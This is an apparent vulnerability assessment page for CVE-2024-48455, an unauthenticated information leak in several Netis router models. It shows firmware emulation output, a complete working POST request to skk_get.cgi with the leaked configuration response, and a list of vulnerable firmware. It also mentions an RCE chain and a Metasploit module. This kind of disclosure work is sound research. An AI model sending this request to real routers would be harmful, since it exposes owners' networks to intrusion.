Moderate
CVE-2024-48455
Moderate
(1 user assessed)
Very High
(1 user assessed)Unknown
Unknown
Unknown
Description
An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the mode_name, wl_link parameters of the skk_get.cgi component.
Add Assessment
Technical Analysis
CVE-2024-48555 allows for unauthenticated information disclosure revealing sensitive configuration information of several Netis Routers including rebranded routers from GLCtec and Stonet which can be used by the attacker to determine of the router is running specific vulnerable firmware.
We are using FirmAE to emulate the Netis Router firmware and using burpsuite to capture the request.
For this test, we are using the Netis Wifi 11AC Router Netis_NC65v2-V3.0.0.3800.bin vulnerable firmware version.
./run.sh -d netis /root/FirmAE/firmwares/Netis_NC65v2-V3.0.0.3800.bin [*] /root/FirmAE/firmwares/Netis_NC65v2-V3.0.0.3800.bin emulation start!!! [*] extract done!!! [*] get architecture done!!! [*] /root/FirmAE/firmwares/Netis_NC65v2-V3.0.0.3800.bin already succeed emulation!!! [IID] 12 [MODE] debug [+] Network reachable on 192.168.1.1! [+] Web service on 192.168.1.1 [+] Run debug! Creating TAP device tap12_0... Set 'tap12_0' persistent and owned by uid 0 Bringing up TAP device... Starting emulation of firmware... 192.168.1.1 true true 39.913154010 41.109368119 [*] firmware - Netis_NC65v2-V3.0.0.3800 [*] IP - 192.168.1.1 [*] connecting to netcat (192.168.1.1:31337) [+] netcat connected ------------------------------ | FirmAE Debugger | ------------------------------ 1. connect to socat 2. connect to shell 3. tcpdump 4. run gdbserver 5. file transfer 6. exit > 2 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. ~ # pwd /
By issuing a simple POST request as listed below, you can obtain all the information of the router without any authentication.
POST Request
POST /cgi-bin/skk_get.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:131.0) Gecko/20100101 Firefox/131.0 Content-Type: application/x-www-form-urlencoded Content-Length: 27 Connection: keep-alive mode_name=skk_get&wl_link=0
Response
HTTP/1.1 200 OK Date: Sun, 01 Jan 2023 00:07:53 GMT Server: Boa/0.94.14rc21 Connection: close { "version":"netis(NC65)V3.0.0.3800", "vender":"CIS", "model":"NC65v2", "easy_mesh":"EASYMESH", "switch_chipset":"", "tr069":"1", "time_now":"2023/01/01 08:07:53", "sys_date":"2023", "sys_date2":"1", "sys_date3":"1", "sys_time":"8", "sys_time2":"7", "sys_time3":"53", "uptime":"489","cpu": "20%","mem":"7%", "statsList":[{ --- lot of additional information --- "wlanInfo":[ { "st_wlconn":"0","apLinkList":[], }, { "st_wlconn":"0","apLinkList":[], }, ], "routeTable":[ { "dstip":"192.168.1.0", "mask":"255.255.255.0", "gw":"0.0.0.0", }, ], "arpList"[ { "id":"1", "arp_ip":"192.168.1.2", "arp_mac":"d2:36:9f:d8:14:bf", "arp_host_name":"", "is_qos_idx":"0", "qos_up_limit":"0", "qos_down_limit":"0", }, ], "dhcpList":[],"ndp_list":[ { "id":"1", "ndp_ip6":"fe80::d036:9fff:fed8:14bf", "ndp_mac":"d2:36:9f:d8:14:bf", }, ], "macClone":"d2:36:9f:d8:14:bf", "wscLock":"0", "ddnsInfo":"DDNS_STATE_START", "serialNo":"", "easymesh":{} }
This CVE can be chained with CVE-2024-48456 and CVE-2024-48457 into an unauthenticated RCE.
A Metasploit module can be found here to exploit these routers.
Mitigation
There is no fix available.
The following router firmware versions are vulnerable:
- netis_MW5360_V1.0.1.3031_fw.bin
- Netis_MW5360-1.0.1.3442.bin
- Netis_MW5360_RUSSIA_844.bin
- netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
- netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
- netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
- Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
- netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
- netis_NC65_V3.0.0.3749.bin
- Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
- Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
- netis_NX10_V2.0.1.3582_fw.bin
- netis_NX10_V2.0.1.3643.bin
- Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
- netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
- netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
- netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
- Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
- GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
References
CVE-2024-48455
Metasploit Module PR 19770
Research Notes – Netis Router Exploit Chain Reactor
Credits
h00die-gr3y –> Discovery
CVSS V3 Severity and Metrics
General Information
Metasploit Modules
References
Miscellaneous
